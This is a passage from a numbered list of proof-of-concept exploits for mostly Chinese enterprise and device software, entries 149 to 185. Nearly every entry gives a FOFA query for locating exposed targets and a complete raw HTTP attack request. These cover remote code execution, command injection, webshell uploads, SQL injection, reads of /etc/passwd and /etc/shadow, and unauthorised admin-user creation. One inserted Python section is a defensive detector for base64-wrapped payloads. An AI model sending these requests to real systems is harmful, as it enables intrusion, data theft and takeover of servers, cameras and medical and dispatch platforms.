{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
Same request as entry 149 with id as the command:
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
The request below reaches the data-source listing unauthenticated through the same ;swagger-ui path trick; the injectable parameter itself is not shown in the listing.
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter. The username part of the Basic credential is passed to a shell unescaped, so ls runs on the appliance; replace it with any command.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

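Three POCs in this list hide their payload behind base64: the sql query parameter in entry 122, the system (and passwd) parameters in entry 144, and the Basic-auth username here in entry 152. A log search or WAF rule that looks for select or ;ls; in the raw request never matches any of them. The Python below is an added example, not part of the original list or of any vendor's code: it decodes base64-shaped query values and Basic credentials before classifying them, and knows the two endpoint/parameter pairs from entries 122 and 144 where any decoded value is executed. The sample requests are reconstructed from the page and the benign login is constructed; nothing is sent anywhere.

```python
"""
Added example, not part of the original list. The payloads in entries 122
(sql= query parameter), 144 (system= query parameter) and 152 (Basic-auth
username) are base64-wrapped, so a filter or log search for 'select' or ';ls;'
on the raw request never matches. This decodes the wrapped fields first. The
sample requests are reconstructed from the page; nothing is sent anywhere.
"""
import base64
import binascii
import re
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

SQL_WORDS = re.compile(r"\b(select|union|sleep|pg_sleep|updatexml|extractvalue)\b", re.I)
SHELL_META = re.compile(r"[;|`]|\$\(|\$\{IFS\}")
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{2,}={0,2}$")

# Endpoint/parameter pairs from entries 122 and 144 whose decoded value the
# application executes; any value there is reportable even if it is just 'id'.
KNOWN_SINKS = {
    ("/importexport.php", "sql"): "sql",
    ("/cgi-bin/nas_sharing.cgi", "system"): "shell",
}


def try_b64(value: str) -> Optional[str]:
    """Decode if the value looks like base64 text; tolerate missing '=' padding (entry 144)."""
    if not B64_SHAPE.match(value):
        return None
    padded = value + "=" * (-len(value) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def classify(text: str) -> Optional[str]:
    """Coarse content heuristic for a decoded field."""
    if SQL_WORDS.search(text):
        return "sql"
    if SHELL_META.search(text):
        return "shell"
    return None


def analyse_request(raw_request: str) -> list:
    """Return one finding per decoded query parameter or Basic credential that carries a payload."""
    lines = raw_request.strip().splitlines()
    _method, target, _version = lines[0].split(" ", 2)
    parts = urlsplit(target)
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = try_b64(value)
        if decoded is None:
            continue
        kind = KNOWN_SINKS.get((parts.path, name)) or classify(decoded)
        if kind:
            findings.append({"where": f"query:{name}", "path": parts.path,
                             "decoded": decoded, "kind": kind})
    for line in lines[1:]:
        if line.lower().startswith("authorization: basic "):
            creds = try_b64(line.split(" ", 2)[2].strip())
            kind = classify(creds) if creds is not None else None
            if kind:
                findings.append({"where": "header:Authorization", "path": parts.path,
                                 "decoded": creds, "kind": kind})
    return findings


# Constructed samples: the three page requests reduced to the relevant lines, plus a benign login.
SAMPLES = {
    "122": "GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1\r\nHost: x.x.x.x\r\n",
    "144": "GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1\r\nHost: x.x.x.x\r\n",
    "152": "GET /access/set?param=enableapi&value=1 HTTP/1.1\r\nHost: x.x.x.x\r\nAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=\r\n",
    "benign": "GET /access/set?param=enableapi&value=1 HTTP/1.1\r\nHost: x.x.x.x\r\nAuthorization: Basic "
              + base64.b64encode(b"admin:Summer2024!").decode() + "\r\n",
}

if __name__ == "__main__":
    for label, req in SAMPLES.items():
        print(label, analyse_request(req))
```

The content heuristic is deliberately narrow (semicolon, pipe, backtick, $( and ${IFS} for shell; a handful of SQL functions) so that ordinary passwords in Basic headers do not fire; the endpoint table is what catches a bare id in entry 144.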
153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the server copy /etc/passwd into a temporary file under its cache
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy (the hash directory in the path is returned by the step 2 response)
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwei'er (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
Time-based blind injection through the gsdwid query field; PG_SLEEP(5) shows the backend is PostgreSQL:
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The response returns the stored name; access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
Affected:
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

The mdc value in the request below URL-decodes to: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt;
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (DT HD license plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 25

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
